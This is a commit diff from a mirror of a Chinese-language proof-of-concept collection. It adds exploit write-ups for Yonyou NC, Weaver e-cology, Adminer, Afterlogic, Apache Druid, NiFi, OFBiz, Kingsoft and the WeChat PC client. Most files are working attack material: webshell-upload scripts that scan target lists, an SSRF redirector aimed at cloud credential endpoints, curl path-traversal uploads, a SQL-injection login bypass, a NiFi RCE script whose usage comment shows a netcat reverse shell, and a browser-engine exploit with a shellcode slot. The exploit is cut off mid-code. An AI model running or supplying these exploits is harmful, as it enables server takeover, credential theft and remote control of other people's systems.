admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 10:50:23 +00:00
Code Issues Packages Projects Releases Wiki Activity

更新漏洞

Browse Source
This commit is contained in:
Threekiii 2022-12-05 17:54:08 +08:00
parent cba0c4db58
commit ed6c0342e5
31 changed files with 1488 additions and 89 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
CMS漏洞/Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342.md Normal file
View File

@ -0,0 +1,23 @@
# Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342
## 漏洞描述
- https://packetstormsecurity.com/files/161048/anchorcms0127-xsrf.txt
## FOFA
```
"Anchor CMS" && body="themes/default/img/favicon.png"
```
## 漏洞复现
Anchor CMS使用Get方法进行敏感操作可以使用exploit.html进行删除用户等操作。
**exploit.html**
```html
<img src="http://target/anchor/index.php/admin/users/delete/21">
```
当管理员点击时删除ID为21的用户。

45
OA产品漏洞/泛微OA E-cology KtreeUploadAction 任意文件上传.md Normal file
View File

@ -0,0 +1,45 @@
# 泛微OA E-cology KtreeUploadAction 任意文件上传
## 漏洞描述
参考链接:
- [泛微e-cology任意文件上传(已修复)](https://mp.weixin.qq.com/s?__biz=MzkxMzIzNTU5Mg==&mid=2247483666&idx=1&sn=e70efe98c064e0f1df986e2b65c1a608&chksm=c1018af5f67603e39ce4d6e9375875e63e7b80633a1f99959f8d4652193ac3734765a99099ea&mpshare=1&scene=23&srcid=0414cqXy50udQOy19LYOMega&sharer_sharetime=1618332600979&sharer_shareid=d15208c7b27f111e2fe465f389ab6fac#rd)
## 影响版本
```
目前已修复
```
## 漏洞复现
定位文件:
`ecology\CLASSB~1\com\weaver\formmodel\apps\ktree\servlet\KtreeUploadAction.class`
exp
```
POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=--------1638451160
Content-Length: 171
----------1638451160
Content-Disposition: form-data; name="test"; filename="test.jsp"
Content-Type: image/jpeg
helloword
----------1638451160--
```

2
OA产品漏洞/泛微OA WorkflowServiceXml RCE.md → OA产品漏洞/泛微OA E-cology WorkflowServiceXml RCE.md
View File

@ -1,4 +1,4 @@
# 泛微OA WorkflowServiceXml RCE
# 泛微OA E-cology WorkflowServiceXml RCE
## 漏洞描述

197
OA产品漏洞/用友 NC FileReceiveServlet 反序列化RCE漏洞.md Normal file
View File

@ -0,0 +1,197 @@
# 用友 NC FileReceiveServlet 反序列化RCE漏洞
## 漏洞描述
用友NC 存在反序列化 RCE漏洞攻击者可利用控制服务器
## 漏洞影响
```
用友NC 6.5
```
## FOFA
```
app="用友-UFIDA-NC"
```
## 漏洞复现
首先从任意文件上传说起
任意文件上传分析代码在`servlet.FileReceiveServlet`。在这里我们可以看到从请求中读取流然后转换为map类型并读取上传文件的路径。然后再读取待上传的文件。
![yongyou-5-1](./images/yongyou-5-1.png)
而网上很多poc大多都是基于此漏洞利用反序列化上传一个文件到服务器。
这也就是去年的那个任意文件上传的反序列化漏洞。但是但是这个漏洞本质是一个反序列化漏洞。而且某C的classpath中也存在apache commonscollections库我们可以利用这个库直接执行命令或者内存马。岂不是比任意文件上传舒服多了。
**内存马**
老样子在反序列化中想执行任意代码一般都依靠xalan这个库。这次也不例外。
植入内存马关键在于我们怎样找到context只有找到context我们才可以添加filter。好在某c中我们只需要通过下面的代码既可以获取当前context不需要从tomcat中获取context
```java
Object obj = 改动Locator.getInstance().lookup("ServletContext");
Field contextField = obj.getClass().getDeclaredField("context");
contextField.setAccessible(true);
obj = contextField.get(obj);
Field contextField1 = obj.getClass().getDeclaredField("context");
contextField1.setAccessible(true);
addFitlertoTomcat(contextField1.get(obj));
```
剩下的就是常规操作,可以看我之前的内存马模型,基本不需要很大的改动即可完美适配。
![yongyou-5-2](./images/yongyou-5-2.png)
**回显**
我们只需要找到这样一个servlet即存在反序列化的readObject又将错误信息写入到response中
不难看出 uploadServlet 就很满足这个需求。
```plain
out = new ObjectOutputStream(output);
in = new ObjectInputStream(request.getInputStream());
String dsName = (String)in.readObject();
}
} catch (Exception var14) {
var14.printStackTrace();
if (out == null) {
throw new ServletException(var14);
}
out.writeObject(var14);
```
如果出错的话将错误信息通过序列化写入到response中。好处在于我们不需要麻烦的去找tomcat的response对象。
所以我们将反序列化的payload发送给uploadServlet即可。然后我们只需要读取响应即可拿到服务器命令执行的回显结果。客户端代码可以这样写
```java
ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(r));
Exception e = (Exception) objectInputStream.readObject();
Object obj = e.getCause();
Field targetF = obj.getClass().getDeclaredField("target");
targetF.setAccessible(true);
obj = targetF.get(obj);
Field msgF = obj.getClass().getSuperclass().getDeclaredField("detailMessage");
msgF.setAccessible(true);
String msg = msgF.get(obj).toString();
System.out.println(msg);
```
### 文件上传EXP
python exp
```
import requests
import threadpool
import urllib3
import sys
import argparse
urllib3.disable_warnings()
proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}
header = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded",
"Referer": "https://google.com",
}
def multithreading(funcname, filename="url.txt", pools=5):
works = []
with open(filename, "r") as f:
for i in f:
func_params = [i.rstrip("\n")]
works.append((func_params, None))
pool = threadpool.ThreadPool(pools)
reqs = threadpool.makeRequests(funcname, works)
[pool.putRequest(req) for req in reqs]
pool.wait()
def wirte_targets(vurl, filename):
with open(filename, "a+") as f:
f.write(vurl + "\n")
return vurl
def exp(u):
uploadHeader = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
"Content-Type": "multipart/form-data;",
"Referer": "https://google.com"
}
uploadData = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x02\x74\x00\x09\x46\x49\x4c\x45\x5f\x4e\x41\x4d\x45\x74\x00\x09\x74\x30\x30\x6c\x73\x2e\x6a\x73\x70\x74\x00\x10\x54\x41\x52\x47\x45\x54\x5f\x46\x49\x4c\x45\x5f\x50\x41\x54\x48\x74\x00\x10\x2e\x2f\x77\x65\x62\x61\x70\x70\x73\x2f\x6e\x63\x5f\x77\x65\x62\x78"
shellFlag="t0test0ls"
uploadData+=shellFlag
try:
req1 = requests.post(u + "/servlet/FileReceiveServlet", headers=uploadHeader, verify=False, data=uploadData, timeout=25)
if req1.status_code == 200 :
req3=requests.get(u+"/t00ls.jsp",headers=header, verify=False, timeout=25)
if req3.text.index(shellFlag)>=0:
printFlag = "[Getshell]" + u+"/t00ls.jsp" + "\n"
print (printFlag)
wirte_targets(printFlag, "vuln.txt")
except :
pass
#print(printFlag, end="")
if __name__ == "__main__":
if (len(sys.argv)) < 2:
print('useage : python' +str(sys.argv[0]) + ' -h')
else:
parser =argparse.ArgumentParser()
parser.description ='YONYOU UC 6.5 FILE UPLOAD!'
parser.add_argument('-u',help="url -> example http://127.0.0.1",type=str,dest='check_url')
parser.add_argument('-r',help="url list to file",type=str,dest='check_file')
args =parser.parse_args()
if args.check_url:
exp(args.check_url)
if(args.check_file):
multithreading(exp, args.check_file, 8)
```
java exp
```
import java.io.*;
import java.util.HashMap;
import java.util.Map;
public class App {
public static void main(String[] args) throws Exception {
String url="http://192.168.40.222";
Map<String, Object> metaInfo=new HashMap<String, Object>();
metaInfo.put("TARGET_FILE_PATH","webapps/nc_web");
metaInfo.put("FILE_NAME","cmd.jsp");
ByteArrayOutputStream baos=new ByteArrayOutputStream();
ObjectOutputStream oos=new ObjectOutputStream(baos);
oos.writeObject(metaInfo);
InputStream in=App.class.getResourceAsStream("cmd.jsp");
byte[] buf=new byte[1024];
int len=0;
while ((len=in.read(buf))!=-1){
baos.write(buf,0,len);
}
HttpClient.post(url+"/servlet/FileReceiveServlet",baos.toByteArray());
HttpResult result=HttpClient.get(url+"/cmd.jsp?cmd=echo+aaaaaa");
if(result.getData().contains("aaaaaa")){
System.out.println("shell路径:"+url+"/cmd.jsp?cmd=whoami");
}else{
System.out.println("上传shell失败或者漏洞不存在");
}
}
}
```
## 参考文章
https://mp.weixin.qq.com/s/IdXYbjNVGVIasuwQH48Q1w

84
OA产品漏洞/用友 NC 反序列化RCE漏洞.md
View File

@ -1,84 +0,0 @@
# 用友 NC 反序列化RCE漏洞
## 漏洞描述
用友NC 存在反序列化 RCE漏洞攻击者可利用控制服务器
## 漏洞影响
```
用友 NC
```
## 漏洞复现
首先从任意文件上传说起
任意文件上传分析代码在`servlet.FileReceiveServlet`。在这里我们可以看到从请求中读取流然后转换为map类型并读取上传文件的路径。然后再读取待上传的文件。
![yongyou-5-1](./images/yongyou-5-1.png)
而网上很多poc大多都是基于此漏洞利用反序列化上传一个文件到服务器。
这也就是去年的那个任意文件上传的反序列化漏洞。但是但是这个漏洞本质是一个反序列化漏洞。而且某C的classpath中也存在apache commonscollections库我们可以利用这个库直接执行命令或者内存马。岂不是比任意文件上传舒服多了。
**内存马**
老样子在反序列化中想执行任意代码一般都依靠xalan这个库。这次也不例外。
植入内存马关键在于我们怎样找到context只有找到context我们才可以添加filter。好在某c中我们只需要通过下面的代码既可以获取当前context不需要从tomcat中获取context
```java
Object obj = 改动Locator.getInstance().lookup("ServletContext");
Field contextField = obj.getClass().getDeclaredField("context");
contextField.setAccessible(true);
obj = contextField.get(obj);
Field contextField1 = obj.getClass().getDeclaredField("context");
contextField1.setAccessible(true);
addFitlertoTomcat(contextField1.get(obj));
```
剩下的就是常规操作,可以看我之前的内存马模型,基本不需要很大的改动即可完美适配。
![yongyou-5-2](./images/yongyou-5-2.png)
**回显**
我们只需要找到这样一个servlet即存在反序列化的readObject又将错误信息写入到response中
不难看出 uploadServlet 就很满足这个需求。
```plain
out = new ObjectOutputStream(output);
in = new ObjectInputStream(request.getInputStream());
String dsName = (String)in.readObject();
}
} catch (Exception var14) {
var14.printStackTrace();
if (out == null) {
throw new ServletException(var14);
}
out.writeObject(var14);
```
如果出错的话将错误信息通过序列化写入到response中。好处在于我们不需要麻烦的去找tomcat的response对象。
所以我们将反序列化的payload发送给uploadServlet即可。然后我们只需要读取响应即可拿到服务器命令执行的回显结果。客户端代码可以这样写
```java
ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(r));
Exception e = (Exception) objectInputStream.readObject();
Object obj = e.getCause();
Field targetF = obj.getClass().getDeclaredField("target");
targetF.setAccessible(true);
obj = targetF.get(obj);
Field msgF = obj.getClass().getSuperclass().getDeclaredField("detailMessage");
msgF.setAccessible(true);
String msg = msgF.get(obj).toString();
System.out.println(msg);
```
## 参考文章
https://mp.weixin.qq.com/s/IdXYbjNVGVIasuwQH48Q1w

87
Web应用漏洞/Adminer-SSRF漏洞 CVE-2021-21311.md Normal file
View File

@ -0,0 +1,87 @@
# Adminer SSRF漏洞 CVE-2021-21311
## 漏洞描述
使用管理员发送任意get请求并从内部服务器检索JSON响应的方法。可以从AWS元数据服务中提取AWS访问密钥。
参考链接:
- https://github.com/advisories/GHSA-x5r2-hj5c-8jx6
- https://gist.github.com/bpsizemore/227141941c5075d96a34e375c63ae3bd
## 漏洞复现
首先启动一个python服务器该服务器侦听传入的连接并以301重定向响应到任意选择的主机。在此示例情况下重定向指向AWS元数据服务
```
http://169.254.169.254/latest/meta-data/instance-id
```
然后在Adminer中使用Elasticsearch登录模块“登录”运行python代码的服务器这导致Adminer从包含服务器的AWS实例ID的元数据服务器打印json响应。
![](images/16133787776790.jpg)
重定向请求的python脚本
```py
#!/usr/bin/env python
import SimpleHTTPServer
import SocketServer
import sys
import argparse
def redirect_handler_factory(url):
"""
Returns a request handler class that redirects to supplied `url`
"""
class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(301)
self.send_header('Location', url)
self.end_headers()
def do_POST(self):
self.send_response(301)
self.send_header('Location', url)
self.end_headers()
return RedirectHandler
def main():
parser = argparse.ArgumentParser(description='HTTP redirect server')
parser.add_argument('--port', '-p', action="store", type=int, default=80, help='port to listen on')
parser.add_argument('--ip', '-i', action="store", default="", help='host interface to listen on')
parser.add_argument('redirect_url', action="store")
myargs = parser.parse_args()
redirect_url = myargs.redirect_url
port = myargs.port
host = myargs.ip
redirectHandler = redirect_handler_factory(redirect_url)
handler = SocketServer.TCPServer((host, port), redirectHandler)
print("serving at port %s" % port)
handler.serve_forever()
if __name__ == "__main__":
main()
```
```
http://169.254.169.254/latest/meta-data/iam/security-credentials/ //列出服务器的可用角色。
```
![](images/16133787994051.jpg)

43
Web应用漏洞/Adobe ColdFusion 远程代码执行漏洞 CVE-2021-21087.md Normal file
View File

@ -0,0 +1,43 @@
# Adobe ColdFusion 远程代码执行漏洞 CVE-2021-21087
## 漏洞描述
Adobe ColdFusion是一个快速应用程序开发平台。Adobe ColdFusion 存在远程代码执行漏洞,由于过滤不严,未经授权的攻击者可构造恶意请求,造成任意代码执行,控制服务器。建议相关用户尽快采取安全措施阻止漏洞攻击。
参考链接:
- https://nosec.org/home/detail/4707.html
- https://github.com/projectdiscovery/nuclei-templates/pull/1128/files
- https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html
## 漏洞影响
```
Adobe ColdFusion 2021 <= Version 2021.0.0.323925
Adobe ColdFusion 2018 <= Update 10
Adobe ColdFusion 2016 <= Update 16
```
## FOFA
```
app="Adobe-ColdFusion"
```
## 漏洞复现
```
- method: GET
path:
- "{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"
regex:
- 'eval\(\"\(\"\+json\+\"\)\"\)'
```

25
Web应用漏洞/Afterlogic Aurora & WebMail Pro 任意文件读取 CVE-2021-26294.md Normal file
View File

@ -0,0 +1,25 @@
# Afterlogic Aurora & WebMail Pro 任意文件读取CVE-2021-26294
## 漏洞描述
攻击者可以通过caldav_public_user@localhost用户登录,不需要其它用户信息就可以读取配置文件从而获得敏感信息。
参考链接:
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26294
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md
- https://forum.ywhack.com/thread-115326-1-8.html
## 漏洞影响
```
WebMail Pro ≤ 7.7.9
Afterlogic Aurora ≤ 7.7.9
```
## 漏洞复现
```
curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"
```

33
Web应用漏洞/Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293.md Normal file
View File

@ -0,0 +1,33 @@
# Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293
## 漏洞描述
该漏洞是由于Afterlogic Aurora & WebMail Pro中对上传的文件过滤和限制存在缺陷攻击者可以通过上传恶意文件从而执行任意代码。
参考链接:
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26293
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26293-rce-via-public-unrestricted-file-upload-vulnerability.md
- https://forum.ywhack.com/thread-115325-1-8.html
## 漏洞影响
```
WebMail Pro ≤ 7.7.9
Afterlogic Aurora ≤ 7.7.9
```
## 漏洞复现
```bash
curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"
```
默认路径为/var/www/html也可能更改配置为其它路径可以尝试其它方式获取。
```bash
curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
//使用无效路径获取SabreDAV错误查看Webroot路径
```

BIN
Web应用漏洞/images/16133787776790.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 223 KiB

BIN
Web应用漏洞/images/16133787994051.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 123 KiB

49
Web应用漏洞/员工管理系统 Employee Management System 1.0 身份验证绕过.md Normal file
View File

@ -0,0 +1,49 @@
# 员工管理系统 Employee Management System 1.0 身份验证绕过
## 漏洞描述
漏洞发现时间2020-10-16
软件下载地址https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
验证环境Windows 10 + xampp v3.2.4
参考链接:
- https://www.exploit-db.com/exploits/48882
## 漏洞复现
打开网址:
```
http://localhost:8081/Employee%20Management%20System/alogin.html
```
通过payload绕过验证
```
anki' or 1=1#
```
发送请求:
```
POST /Employee%20Management%20System/process/aprocess.php HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/Employee%20Management%20System/alogin.html
Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv
Upgrade-Insecure-Requests: 1
mailuid=anki%27+or+1%3D1%23&pwd=anki%27+or+1%3D1%23&login-submit=Login
```
将以Admin身份登录应用

21
Web应用漏洞/金山 V8 V9 终端安全系统 文件上传漏洞.md Normal file
View File

@ -0,0 +1,21 @@
# 金山 V8 V9 终端安全系统 文件上传漏洞
## 漏洞描述
参考链接:
- https://forum.butian.net/share/76
## 漏洞复现
在tools目录下的mange下存在一个upload.php。该文件可导致任意文件上传。
poc
```
POST /tools/manage/upload.php HTTP/1.1
HOST: target
...
<?php phpinfo(); ?>
```

22
Web应用漏洞/阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md Normal file
View File

@ -0,0 +1,22 @@
# 阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592
## 漏洞描述
阿里巴巴otter manager分布式数据库同步系统是基于数据库增量日志解析准实时同步到本机房或异地机房的mysql/oracle数据库一个分布式数据库同步系统。阿里巴巴otter manager分布式数据库同步系统存在信息泄露漏洞攻击者可利用漏洞获取zookper信息。
参考链接:
* https://www.cnvd.org.cn/flaw/show/CNVD-2021-16592
* https://forum.ywhack.com/thread-115309-1-8.html
## FOFA
```
title="Otter Manager"
```
## 漏洞复现
默认口令:`admin/admin`
进入后直接f12查看元素修改password为text即可查看数据库等敏感信息密码。

10
Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-25646.md
View File

@ -4,7 +4,15 @@
Apache Druid 是用Java编写的面向列的开源分布式数据存储旨在快速获取大量事件数据并在数据之上提供低延迟查询。
Apache Druid 默认情况下缺乏授权认证攻击者可以发送特制请求利用Druid服务器上进程的特权执行任意代码。
Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中默认已被禁用。但是在Druid 0.20.0及更低版本中经过身份验证的用户发送恶意请求利用Apache Druid漏洞可以执行任意代码
Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中默认已被禁用。但是在Druid 0.20.0及更低版本中经过身份验证的用户发送恶意请求利用Apache Druid漏洞可以执行任意代码。
参考链接:
* https://github.com/apache/druid/issues/2434
* https://forum.ywhack.com/thread-115083-1-1.html
* https://druid.apache.org/docs/latest/operations/api-reference.html#broker
* https://lists.apache.org/thread.html/r20e0c3b10ae2c05a3aad40f1476713c45bdefc32c920b9986b941d8f@%3Cannounce.apache.org%3E
* https://www.o2oxy.cn/3090.html
## 漏洞影响

29
Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-26919.md Normal file
View File

@ -0,0 +1,29 @@
# Apache Druid 远程代码执行漏洞 CVE-2021-26919
## 漏洞描述
Apache Druid 是用Java编写的面向列的开源分布式数据存储旨在快速获取大量事件数据并在数据之上提供低延迟查询。2021年3月30日Apache Druid官方发布安全更新修复了 CVE-2021-26919 Apache Druid 远程代码执行漏洞。由于Apache Druid 默认情况下缺乏授权认证,攻击者可直接构造恶意请求执行任意代码,控制服务器。
参考链接:
* http://m0d9.me/2021/04/21/Apache-Druid-CVE-2021-26919-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
* https://help.aliyun.com/noticelist/articleid/1060822985.html
## 漏洞影响
```
Apache Druid < 0.20.2
```
## 漏洞复现
jdbc触发点https://druid.apache.org/docs/0.19.0/development/extensions-core/druid-lookups.html#polling-lookup
poc:
```
url = "jdbc:mysql://localhost:3307/?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&maxAllowedPacket=65535"
user ="cb1"
password="password"
```

126
Web服务器漏洞/Apache NiFi Api 远程代码执行 RCE.md Normal file
View File

@ -0,0 +1,126 @@
# Apache NiFi Api 远程代码执行 RCE
## 漏洞描述
Apache NiFi是Apache Software Foundation的一个软件项目旨在使软件系统之间的数据流自动化。
参考链接:
- https://twitter.com/chybeta/status/1333341820596568065
- https://github.com/imjdl/Apache-NiFi-Api-RCE
- https://forum.ywhack.com/thread-114763-1-3.html
## FOFA
```
"nifi" && title=="NiFi"
```
## 漏洞复现
exp
```python
import sys
import json
import requests as req
class Exp:
def __init__(self, url):
self.url = url
def check_is_vul(self):
url = self.url + "/nifi-api/access/config"
try:
res = req.get(url=url, verify=False)
data = res.json()
return not data["config"]["supportsLogin"]
except Exception as e:
pass
return False
def clean_up(self, p_id):
url = self.url + "/nifi-api/processors/" + p_id + "/run-status"
data = {'revision': {'clientId': 'x', 'version': 1}, 'state': 'STOPPED'}
req.put(url=url, data=json.dumps(data), verify=False)
req.delete(url + "/threads", verify=False)
def exploit(self, cmd):
g_id = self.fetch_process_group()
if g_id:
p_id = self.create_process(g_id)
if p_id:
self.run_cmd(p_id=p_id, cmd=cmd)
self.clean_up(p_id=p_id)
def run_cmd(self, p_id, cmd):
url = self.url + "/nifi-api/processors/" + p_id
cmd = cmd.split(" ")
data = {
'component': {
'config': {
'autoTerminatedRelationships': ['success'],
'properties': {
'Command': cmd[0],
'Command Arguments': " ".join(cmd[1:]),
},
'schedulingPeriod': '3600 sec'
},
'id': p_id,
'state': 'RUNNING'
},
'revision': {'clientId': 'x', 'version': 1}
}
print(data)
headers = {
"Content-Type": "application/json",
}
res = req.put(url=url, data=json.dumps(data), headers=headers, verify=False)
return res.json()
def fetch_process_group(self):
url = self.url + "/nifi-api/process-groups/root"
try:
res = req.get(url=url, verify=False)
data = res.json()["id"]
return data
except Exception as e:
pass
return 0
def create_process(self, process_group_id):
url = self.url + "/nifi-api/process-groups/" + process_group_id + "/processors"
data = {
'component': {
'type': 'org.apache.nifi.processors.standard.ExecuteProcess'
},
'revision': {
'version': 0
}
}
headers = {
"Content-Type": "application/json",
}
try:
res = req.post(url=url, data=json.dumps(data), headers=headers, verify=False)
return res.json()["id"]
except Exception as e:
pass
return 0
if __name__ == '__main__':
if len(sys.argv) != 3:
print("rce.py url cmd")
else:
url = sys.argv[1] # http://192.168.1.1:8080
cmd = sys.argv[2] # nc -e /bin/bash 192.168.1.129 1234
e = Exp(url)
e.exploit(cmd)
```
msf模块
https://packetstormsecurity.com/files/160260/apache_nifi_processor_rce.rb.txt

51
Web服务器漏洞/Apache OFBiz RMI Bypass RCE CVE-2021-29200.md Normal file
View File

@ -0,0 +1,51 @@
# Apache OFBiz RMI Bypass RCE CVE-2021-29200
## 漏洞描述
由于Apache OFBiz存在Java RMI反序列化漏洞未经身份验证的用户可以执行RCE攻击导致服务器被接管。
参考链接:
- https://mp.weixin.qq.com/s/vM0pXZ5mhusFBsj1xD-2zw
- https://xz.aliyun.com/t/9556
## 漏洞影响
```
Apache OFBiz < 17.12.07
```
## 漏洞复现
poc
```
POST /webtools/control/SOAPService HTTP/1.1
Host: xxx
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: text/xml
Content-Length: 877
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-Map>
<map-Entry>
<map-Key>
<cus-obj>ACED0005737200326A617661782E6D616E6167656D656E742E72656D6F74652E726D692E524D49436F6E6E656374696F6E496D706C5F5374756200000000000000020200007872001A6A6176612E726D692E7365727665722E52656D6F746553747562ECC98BE1651A0200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707738000A556E6963617374526566000F3130342E3135362E3233312E3135300000270FFFFFFFFFEF34D1DB00000000000000000000000000000078</cus-obj>
</map-Key>
<map-Value>
<std-String/>
</map-Value>
</map-Entry>
</map-Map>
</ser>
</soapenv:Body>
</soapenv:Envelope>
```

196
其他漏洞/微信客户端 远程命令执行漏洞.md Normal file
View File

@ -0,0 +1,196 @@
# 微信客户端 远程命令执行漏洞
## 漏洞描述
微信客户端存在远程命令执行漏洞。目前已经发现在野利用受害者点击链接就会中招微信Windows PC版进程webchatweb.exe会加载shellcode执行整个过程无文件落地无新进程产生攻击者可以直接获取目标机器权限。
参考链接:
- https://mp.weixin.qq.com/s/OfPNr-l_9kzl1MdE7DSHHQ
## 漏洞影响
```
微信Windows版 <=3.2.1.141 截止2022年12月最新版为3.8.0.41
```
## 漏洞复现
[安恒信息应急响应中心](https://mp.weixin.qq.com/s/OfPNr-l_9kzl1MdE7DSHHQ)分析的攻击链:
1. 攻击者利用微信PC版0day构造恶意的钓鱼链接通过微信将钓鱼链接发送给目标员工。
2. 当员工打开攻击者的钓鱼链接时触发该漏洞从而导致目标员工PC被植入攻击者制作的cobalstrike木马木马进程为xxxsoft.exe同时创建了名为dotnet_v4.3的系统服务。
3. 随后攻击者进一步在c:\\ProgramData\目录下放置TxPortMap.exe 扫描工具并利用该工具扫描目标单位内网。
exploit.js
```
ENABLE_LOG = true;
IN_WORKER = true;
// run calc and hang in a loop
var shellcode = [#shellcode];//shellcode替换成自己的 注意是x86的
function print(data) {
}
var not_optimised_out = 0;
var target_function = (function (value) {
if (value == 0xdecaf0) {
not_optimised_out += 1;
}
not_optimised_out += 1;
not_optimised_out |= 0xff;
not_optimised_out *= 12;
});
for (var i = 0; i < 0x10000; ++i) {
target_function(i);
}
var g_array;
var tDerivedNCount = 17 * 87481 - 8;
var tDerivedNDepth = 19 * 19;
function cb(flag) {
if (flag == true) {
return;
}
g_array = new Array(0);
g_array[0] = 0x1dbabe * 2;
return 'c01db33f';
}
function gc() {
for (var i = 0; i < 0x10000; ++i) {
new String();
}
}
function oobAccess() {
var this_ = this;
this.buffer = null;
this.buffer_view = null;
this.page_buffer = null;
this.page_view = null;
this.prevent_opt = [];
var kSlotOffset = 0x1f;
var kBackingStoreOffset = 0xf;
class LeakArrayBuffer extends ArrayBuffer {
constructor() {
super(0x1000);
this.slot = this;
}
}
this.page_buffer = new LeakArrayBuffer();
this.page_view = new DataView(this.page_buffer);
new RegExp({ toString: function () { return 'a' } });
cb(true);
class DerivedBase extends RegExp {
constructor() {
// var array = null;
super(
// at this point, the 4-byte allocation for the JSRegExp `this` object
// has just happened.
{
toString: cb
}, 'g'
// now the runtime JSRegExp constructor is called, corrupting the
// JSArray.
);
// this allocation will now directly follow the FixedArray allocation
// made for `this.data`, which is where `array.elements` points to.
this_.buffer = new ArrayBuffer(0x80);
g_array[8] = this_.page_buffer;
}
}
// try{
var derived_n = eval(`(function derived_n(i) {
if (i == 0) {
return DerivedBase;
}
class DerivedN extends derived_n(i-1) {
constructor() {
super();
return;
${"this.a=0;".repeat(tDerivedNCount)}
}
}
return DerivedN;
})`);
gc();
new (derived_n(tDerivedNDepth))();
this.buffer_view = new DataView(this.buffer);
this.leakPtr = function (obj) {
this.page_buffer.slot = obj;
